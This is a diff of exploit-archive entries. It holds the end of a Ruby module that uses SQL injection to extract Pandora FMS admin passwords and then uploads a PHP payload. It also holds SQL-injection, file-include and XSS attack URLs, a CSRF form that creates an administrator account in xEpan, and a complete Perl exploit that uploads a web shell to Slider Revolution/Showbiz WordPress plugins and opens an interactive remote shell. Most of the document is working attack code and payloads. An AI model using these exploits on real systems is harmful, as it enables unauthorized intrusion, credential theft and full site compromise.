sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 "
|
||||
sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
|
||||
sqli << "BY x)a) AND 'msf'='msf"
|
||||
|
||||
password = inject_sql(sqli, clue)
|
||||
|
||||
if password && password.length != 0
|
||||
print_status("#{peer} - Extracted auto login password (#{password})")
|
||||
else
|
||||
print_error("#{peer} - No auto login password has been defined!")
|
||||
return false
|
||||
end
|
||||
|
||||
print_status("#{peer} - Attempting to authenticate using (admin:#{password})")
|
||||
# Attempt to login using login hash password
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'loginhash' => 'auto',
|
||||
},
|
||||
'vars_post' => {
|
||||
'loginhash_data' => Rex::Text.md5("admin#{password}"),
|
||||
'loginhash_user' => 'admin',
|
||||
}
|
||||
})
|
||||
|
||||
return auth_succeeded?(res)
|
||||
end
|
||||
|
||||
|
||||
def auth_succeeded?(res)
|
||||
if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
|
||||
print_status("#{peer} - Successfully authenticated!")
|
||||
print_status("#{peer} - Attempting to retrieve session cookie")
|
||||
@cookie = res.get_cookies
|
||||
if @cookie.include?('PHPSESSID')
|
||||
print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}")
|
||||
return true
|
||||
else
|
||||
print_error("#{peer} - Error retrieving cookie!")
|
||||
end
|
||||
else
|
||||
print_error("#{peer} - Authentication failed!")
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
def extract
|
||||
# Generate random string and convert to hex
|
||||
clue = rand_text_alpha(8)
|
||||
hex_clue = clue.each_byte.map { |b| b.to_s(16) }.join
|
||||
|
||||
# select password from tusuario where id_user = 0;
|
||||
sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{hex_clue},(SELECT MID((IFNULL"
|
||||
sqli << "(CAST(password AS CHAR),0x20)),1,50) FROM tusuario WHERE id_user = 0 LIMIT 0,1)"
|
||||
sqli << ",0x#{hex_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
|
||||
sqli << "x)a) AND 'msf'='msf"
|
||||
|
||||
password = inject_sql(sqli, clue)
|
||||
|
||||
if password && password.length != 0
|
||||
print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]")
|
||||
else
|
||||
print_error("#{peer} - Unable to extract password hash!")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def inject_sql(sql, fence_post)
|
||||
# Extract password hash from database
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, 'mobile', 'index.php'),
|
||||
'vars_post' => {
|
||||
'action' => 'login',
|
||||
'user' => sql,
|
||||
'password' => 'pass',
|
||||
'input' => 'Login'
|
||||
}
|
||||
})
|
||||
|
||||
result = nil
|
||||
if res && res.code == 200
|
||||
match = res.body.match(/(?<=#{fence_post})(.*)(?=#{fence_post})/)
|
||||
if match
|
||||
result = match[1]
|
||||
else
|
||||
print_error("#{peer} - SQL injection failed")
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def upload
|
||||
# Extract hash and hash2 from response
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /(?<=input type="submit" id="submit-go")(.*)(?=<input id="hidden-directory" name="directory" type="hidden")/
|
||||
form = $1
|
||||
|
||||
# Extract hash
|
||||
if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
hash = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract hash from response!")
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
|
||||
# Extract hash2
|
||||
if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
hash2 = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract hash2 from response!")
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
|
||||
# Extract real_directory
|
||||
if form =~ /(?<=name="real_directory" type="hidden" value=")(.*?)(" \/>)/
|
||||
real_directory = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract real_directory from response!")
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
else
|
||||
print_error("#{peer} - Could not identify upload form!")
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
|
||||
|
||||
# Upload script
|
||||
@payload_name = "#{rand_text_alpha(8)}.php"
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part("<?php #{payload.encoded} ?>", 'text/plain', nil, %Q^form-data; name="file"; filename="#{@payload_name}"^)
|
||||
post_data.add_part('', nil, nil, 'form-data; name="unmask"')
|
||||
post_data.add_part('Go', nil, nil, 'form-data; name="go"')
|
||||
post_data.add_part(real_directory, nil, nil, 'form-data; name="real_directory"')
|
||||
post_data.add_part('images', nil, nil, 'form-data; name="directory"')
|
||||
post_data.add_part("#{hash}", nil, nil, 'form-data; name="hash"')
|
||||
post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"')
|
||||
post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"')
|
||||
|
||||
print_status("#{peer} - Attempting to upload payload #{@payload_name}...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'data' => post_data.to_s,
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?("Upload correct")
|
||||
register_file_for_cleanup(@payload_name)
|
||||
print_status("#{peer} - Successfully uploaded payload")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
# First try to authenticate using default or user-supplied credentials
|
||||
print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})")
|
||||
auth = authenticate
|
||||
|
||||
unless auth
|
||||
print_status("#{peer} - Attempting to extract auto login hash via SQLi")
|
||||
auth = login_hash
|
||||
end
|
||||
|
||||
unless auth
|
||||
print_status("#{peer} - Attempting to extract admin password hash with SQLi")
|
||||
extract
|
||||
fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Uploading PHP payload...")
|
||||
upload
|
||||
|
||||
print_status("#{peer} - Executing payload...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'images', @payload_name),
|
||||
'cookie' => @cookie
|
||||
}, 1)
|
||||
end
|
||||
end
|
48
platforms/php/webapps/35344.txt
Executable file
48
platforms/php/webapps/35344.txt
Executable file
|
@ -0,0 +1,48 @@
|
|||
# Title : RobotStats v1.0 (robot param) SQL Injection Vulnerability
|
||||
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
|
||||
# Home : http://milw00rm.com / its online
|
||||
# Twitter : https://twitter.com/milw00rm or @milw00rm
|
||||
# Date : 22.11.2014
|
||||
# Demo : http://alpesoiseaux.free.fr/robotstats/
|
||||
# Download : http://www.robotstats.com/en/robotstats.zip
|
||||
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
|
||||
# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
|
||||
|
||||
sql inj.:
|
||||
|
||||
target.com/robotstats/admin/robots.php?rub=modif&robot=0x90+union+select+1,2,3,4,5,database(),7,8,9,10
|
||||
|
||||
you look other files for sql example (/robotstats/info-robot.php?robot=?)
|
||||
|
||||
analysis: (/admin/robots.php)
|
||||
|
||||
no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
|
||||
|
||||
include "robots.lib.php"; //line 26
|
||||
|
||||
else if ($rub == "modif")
|
||||
{
|
||||
formulaireRobot($robot); //line 44 (we will be analysis to robots.lib.php for line)
|
||||
}
|
||||
|
||||
analysis: (/admin/robots.lib.php)
|
||||
|
||||
function formulaireRobot($robot) //line 71 (remember function line 44 in robots.php)
|
||||
{
|
||||
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
|
||||
|
||||
if ($robot != -1)
|
||||
{
|
||||
$title = $RS_LANG["ModifyRobot"];
|
||||
$sql = "SELECT *";
|
||||
$sql .= " FROM ".$RS_TABLE_ROBOTS;
|
||||
$sql .= " WHERE id=".$robot; // line 80 (ver yansin amuga goyum!!!)
|
||||
$res = mysql_query($sql) or erreurServeurMySQL($sql);
|
||||
$enr = mysql_fetch_array($res);
|
||||
$rub = "modif";
|
||||
$actif = $enr["actif"];
|
||||
} //line 85
|
||||
|
||||
for demo:
|
||||
|
||||
http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=modif&robot=0x90+union+select+1,2,3,4,5,database(),7,8,9,10
|
9
platforms/php/webapps/35376.txt
Executable file
9
platforms/php/webapps/35376.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/46507/info
|
||||
|
||||
mySeatXT is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
mySeatXT 0.164 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/myseatxt/contactform/cancel.php?lang=../../../../../../../../windows/system.ini%00
|
79
platforms/php/webapps/35381.txt
Executable file
79
platforms/php/webapps/35381.txt
Executable file
|
@ -0,0 +1,79 @@
|
|||
Advisory ID: HTB23240
|
||||
Product: xEpan
|
||||
Vendor: Xavoc Technocrats Pvt. Ltd.
|
||||
Vulnerable Version(s): 1.0.1 and probably prior
|
||||
Tested Version: 1.0.1
|
||||
Advisory Publication: October 22, 2014 [without technical details]
|
||||
Vendor Notification: October 22, 2014
|
||||
Public Disclosure: November 26, 2014
|
||||
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
|
||||
CVE Reference: CVE-2014-8429
|
||||
Risk Level: Medium
|
||||
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
|
||||
Solution Status: Not Fixed
|
||||
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Advisory Details:
|
||||
|
||||
High-Tech Bridge Security Research Lab discovered vulnerability in xEpan, which can be exploited to compromise vulnerable web site.
|
||||
|
||||
|
||||
1) ?ross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429
|
||||
|
||||
The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user accounts. A remote unauthenticated attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit, create new account with administrative privileges and get total control over the vulnerable website.
|
||||
|
||||
A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "password":
|
||||
|
||||
|
||||
<form action="http://[host]/?page=owner/users&web_owner_users_crud_virtualpage=add&submit=web_web_owner_users_crud_virtualpage_form" method="post" name="main">
|
||||
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_name" value="name">
|
||||
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_email" value="email@email.com">
|
||||
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_username" value="immuniweb">
|
||||
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_password" value="password">
|
||||
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_created_at" value="21/10/2014">
|
||||
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_type" value="100">
|
||||
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_is_active" value="1">
|
||||
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_activation_code" value="">
|
||||
<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_last_login_date" value="">
|
||||
<input type="hidden" name="ajax_submit" value="form_submit">
|
||||
<input type="submit" id="btn">
|
||||
</form>
|
||||
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
||||
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Solution:
|
||||
|
||||
Currently we are not aware of any official solution for this vulnerability.
|
||||
|
||||
<b>Disclosure timeline:</b>
|
||||
2014-10-22 Vendor notified via several emails.
|
||||
2014-10-22 Vendor denies vulnerability.
|
||||
2014-11-06 Vulnerability is confirmed in the latest version of xEpan 1.0.4 which was released on the 2nd of November (we initially suspected a "silent fix").
|
||||
2014-11-06 Vulnerability confirmed in 1.0.4 as well. Vendor notified about the problem once again.
|
||||
2014-11-10 Fix requested via several emails.
|
||||
2014-11-17 Fix requested via several emails.
|
||||
2014-11-24 Fix requested via several emails.
|
||||
2014-11-24 Vulnerability still exist in latest version 1.0.4.1 which was released at November, 20.
|
||||
2014-11-26 Public disclosure.
|
||||
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
References:
|
||||
|
||||
[1] High-Tech Bridge Advisory HTB23240 - https://www.htbridge.com/advisory/HTB23240 - ?ross-Site Request Forgery (CSRF) in xEpan.
|
||||
[2] xEpan - http://www.xepan.org/ - xEpan is a an open source content management system (CMS) with Drag & Drop, bootstrap and live text editing.
|
||||
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
|
||||
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
|
||||
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|
289
platforms/php/webapps/35385.pl
Executable file
289
platforms/php/webapps/35385.pl
Executable file
|
@ -0,0 +1,289 @@
|
|||
#!/usr/bin/perl
|
||||
#
|
||||
# Title: Slider Revolution/Showbiz Pro shell upload exploit
|
||||
# Author: Simo Ben youssef
|
||||
# Contact: Simo_at_Morxploit_com
|
||||
# Discovered: 15 October 2014
|
||||
# Coded: 15 October 2014
|
||||
# Updated: 25 November 2014
|
||||
# Published: 25 November 2014
|
||||
# MorXploit Research
|
||||
# http://www.MorXploit.com
|
||||
# Vendor: ThemePunch
|
||||
# Vendor url: http://themepunch.com
|
||||
# Software: Revslider/Showbiz Pro
|
||||
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
|
||||
# Products url:
|
||||
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
|
||||
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
|
||||
# Vulnerable scripts:
|
||||
# revslider/revslider_admin.php
|
||||
# showbiz/showbiz_admin.php
|
||||
#
|
||||
# About the plugins:
|
||||
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
|
||||
# kind of content whith highly customizable, transitions, effects and custom animations.
|
||||
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
|
||||
# amount of teaser items.
|
||||
#
|
||||
# Description:
|
||||
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
|
||||
# attacker to abuse administrative features.
|
||||
# Some of the features include:
|
||||
# Creating/Deleting/Updating sliders
|
||||
# Importing/exporting sliders
|
||||
# Updading plugin
|
||||
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
|
||||
#
|
||||
# PoC on revslider:
|
||||
# 1- Deleting a slider:
|
||||
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
|
||||
# http://****.com/wp-admin/admin-ajax.php
|
||||
# * Connected to ****.com (**.**.**.**) port 80 (#0)
|
||||
# > POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
# > User-Agent: curl/7.35.0
|
||||
# > Host: ****.com
|
||||
# > Accept: */*
|
||||
# > Content-Length: 73
|
||||
# > Content-Type: application/x-www-form-urlencoded
|
||||
# >
|
||||
# * upload completely sent off: 73 out of 73 bytes
|
||||
# < HTTP/1.1 200 OK
|
||||
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
|
||||
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
|
||||
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
|
||||
# < X-Powered-By: PHP/5.4.18
|
||||
# < X-Robots-Tag: noindex
|
||||
# < X-Content-Type-Options: nosniff
|
||||
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
|
||||
# < Cache-Control: no-cache, must-revalidate, max-age=0
|
||||
# < Pragma: no-cache
|
||||
# < X-Frame-Options: SAMEORIGIN
|
||||
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
|
||||
# < Transfer-Encoding: chunked
|
||||
# < Content-Type: text/html; charset=UTF-8
|
||||
# <
|
||||
# * Connection #0 to host http://****.com left intact
|
||||
#
|
||||
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
|
||||
#
|
||||
# 2- Uploading an web shell:
|
||||
# The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
|
||||
# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
|
||||
# http://www.morxploit.com/morxploits/revslider.zip
|
||||
# http://www.morxploit.com/morxploits/showbiz.zip
|
||||
# and save them it in the same directory where you have the exploit.
|
||||
#
|
||||
# Demo:
|
||||
# perl morxrev.pl http://localhost revslider
|
||||
# ===================================================
|
||||
# --- Revslider/Showbiz shell upload exploit
|
||||
# --- By: Simo Ben youssef <simo_at_morxploit_com>
|
||||
# --- MorXploit Research www.MorXploit.com
|
||||
# ===================================================
|
||||
# [*] Target set to revslider
|
||||
# [*] MorXploiting http://localhost
|
||||
# [*] Sent payload
|
||||
# [+] Payload successfully executed
|
||||
# [*] Checking if shell was uploaded
|
||||
# [+] Shell successfully uploaded
|
||||
#
|
||||
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
|
||||
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
#
|
||||
# www-data@MorXploit:~$
|
||||
#
|
||||
# Download:
|
||||
# Exploit:
|
||||
# http://www.morxploit.com/morxploits/morxrevbiz.pl
|
||||
# Exploit update zip files:
|
||||
# http://www.morxploit.com/morxploits/revslider.zip
|
||||
# http://www.morxploit.com/morxploits/showbiz.zip
|
||||
#
|
||||
# Requires LWP::UserAgent
|
||||
# apt-get install libwww-perl
|
||||
# yum install libwww-perl
|
||||
# perl -MCPAN -e 'install Bundle::LWP'
|
||||
# For SSL support:
|
||||
# apt-get install liblwp-protocol-https-perl
|
||||
# yum install perl-Crypt-SSLeay
|
||||
#
|
||||
# Mitigation:
|
||||
# Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have
|
||||
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
|
||||
# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
|
||||
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
|
||||
# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
|
||||
# auto-update feature on, otherwise ... you are screwed.
|
||||
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
|
||||
# as well as the ability to dump the entire wordpress database locally.
|
||||
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
|
||||
# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
|
||||
#
|
||||
# Author disclaimer:
|
||||
# The information contained in this entire document is for educational, demonstration and testing purposes only.
|
||||
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
|
||||
#
|
||||
# Got comments or questions?
|
||||
# Simo_at_MorXploit_dot_com
|
||||
#
|
||||
# Did you like this exploit?
|
||||
# Feel free to buy me a beer =)
|
||||
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
|
||||
# Cheers!
|
||||
|
||||
use LWP::UserAgent;
|
||||
use MIME::Base64;
|
||||
use strict;
|
||||
|
||||
sub banner {
|
||||
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
|
||||
print "===================================================\n";
|
||||
print "--- Revslider/Showbiz shell upload exploit\n";
|
||||
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
|
||||
print "--- MorXploit Research www.MorXploit.com\n";
|
||||
print "===================================================\n";
|
||||
}
|
||||
|
||||
if (!defined ($ARGV[0] && $ARGV[1])) {
|
||||
banner();
|
||||
print "perl $0 <target> <plugin>\n";
|
||||
print "perl $0 http://localhost revslider\n";
|
||||
print "perl $0 http://localhost showbiz\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
my $zip1 = "revslider.zip";
|
||||
my $zip2 = "showbiz.zip";
|
||||
|
||||
unless (-e ($zip1 && $zip2))
|
||||
{
|
||||
banner();
|
||||
print "[-] $zip1 or $zip2 not found! RTFM\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
my $host = $ARGV[0];
|
||||
my $plugin = $ARGV[1];
|
||||
my $action;
|
||||
my $update_file;
|
||||
|
||||
if ($plugin eq "revslider") {
|
||||
$action = "revslider_ajax_action";
|
||||
$update_file = "$zip1";
|
||||
}
|
||||
elsif ($plugin eq "showbiz") {
|
||||
$action = "showbiz_ajax_action";
|
||||
$update_file = "$zip2";
|
||||
}
|
||||
else {
|
||||
banner();
|
||||
print "[-] Wrong plugin name\n";
|
||||
print "perl $0 <target> <plugin>\n";
|
||||
print "perl $0 http://localhost revslider\n";
|
||||
print "perl $0 http://localhost showbiz\n";
|
||||
exit;
|
||||
}
|
||||
my $target = "wp-admin/admin-ajax.php";
|
||||
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";
|
||||
|
||||
sub randomagent {
|
||||
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
|
||||
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
|
||||
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
|
||||
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
|
||||
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
|
||||
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
|
||||
);
|
||||
my $random = $array[rand @array];
|
||||
return($random);
|
||||
}
|
||||
my $useragent = randomagent();
|
||||
|
||||
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
|
||||
$ua->timeout(10);
|
||||
$ua->agent($useragent);
|
||||
my $status = $ua->get("$host/$target");
|
||||
unless ($status->is_success) {
|
||||
banner();
|
||||
print "[-] Xploit failed: " . $status->status_line . "\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
banner();
|
||||
print "[*] Target set to $plugin\n";
|
||||
print "[*] MorXploiting $host\n";
|
||||
|
||||
my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
|
||||
|
||||
print "[*] Sent payload\n";
|
||||
|
||||
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
|
||||
print "[+] Payload successfully executed\n";
|
||||
}
|
||||
|
||||
elsif ($exploit->decoded_content =~ /Wrong request/) {
|
||||
print "[-] Payload failed: Not vulnerable\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
elsif ($exploit->decoded_content =~ m/0$/) {
|
||||
print "[-] Payload failed: Plugin unavailable\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
else {
|
||||
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
|
||||
print "[-] Payload failed:$1\n";
|
||||
print "[-] " . $exploit->decoded_content unless (defined $1);
|
||||
print "\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
print "[*] Checking if shell was uploaded\n";
|
||||
|
||||
sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
|
||||
my $rndstr = rndstr(8, 1..9, 'a'..'z');
|
||||
my $cmd1 = encode_base64("echo $rndstr");
|
||||
my $status = $ua->get("$host/$shell?cmd=$cmd1");
|
||||
|
||||
if ($status->decoded_content =~ /system\(\) has been disabled/) {
|
||||
print "[-] Xploit failed: system() has been disabled\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
elsif ($status->decoded_content !~ /$rndstr/) {
|
||||
print "[-] Xploit failed: " . $status->status_line . "\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
elsif ($status->decoded_content =~ /$rndstr/) {
|
||||
print "[+] Shell successfully uploaded\n";
|
||||
}
|
||||
my $cmd2 = encode_base64("whoami");
|
||||
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
|
||||
my $cmd3 = encode_base64("uname -n");
|
||||
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
|
||||
my $cmd4 = encode_base64("id");
|
||||
my $id = $ua->get("$host/$shell?cmd=$cmd4");
|
||||
my $cmd5 = encode_base64("uname -a");
|
||||
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
|
||||
print $unamea->decoded_content;
|
||||
print $id->decoded_content;
|
||||
my $wa = $whoami->decoded_content;
|
||||
my $un = $uname->decoded_content;
|
||||
chomp($wa);
|
||||
chomp($un);
|
||||
|
||||
while () {
|
||||
print "\n$wa\@$un:~\$ ";
|
||||
chomp(my $cmd=<STDIN>);
|
||||
if ($cmd eq "exit")
|
||||
{
|
||||
print "Aurevoir!\n";
|
||||
exit;
|
||||
}
|
||||
my $ucmd = encode_base64("$cmd");
|
||||
my $output = $ua->get("$host/$shell?cmd=$ucmd");
|
||||
print $output->decoded_content;
|
||||
}
|
9
platforms/php/webapps/35387.txt
Executable file
9
platforms/php/webapps/35387.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/46561/info
|
||||
|
||||
phpShop is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
phpShop versions 0.8.1 and prior are vulnerable.
|
||||
|
||||
http://www.example.com/phpshop0_8_1/?page=store/XSS&%26%26%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3d1
|
32
platforms/php/webapps/35388.txt
Executable file
32
platforms/php/webapps/35388.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
|
||||
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
[+] Author : KnocKout
|
||||
[~] Contact : knockout@e-mail.com.tr
|
||||
[~] HomePage : http://h4x0resec.blogspot.com
|
||||
[~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
|
||||
DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
|
||||
.__ _____ _______
|
||||
| |__ / | |___ __\ _ \_______ ____
|
||||
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
|
||||
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|
||||
|___| /\____ |/__/\_ \\_____ /__| \___ >
|
||||
\/ |__| \/ \/ \/
|
||||
_____________________________
|
||||
/ _____/\_ _____/\_ ___ \
|
||||
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
|
||||
/ \ | \\ \____
|
||||
/_______ //_______ / \______ /
|
||||
\/ \/ \/
|
||||
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|~App. : WordPress - (html5-mp3-player-with-playlist) Plugin
|
||||
|~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/
|
||||
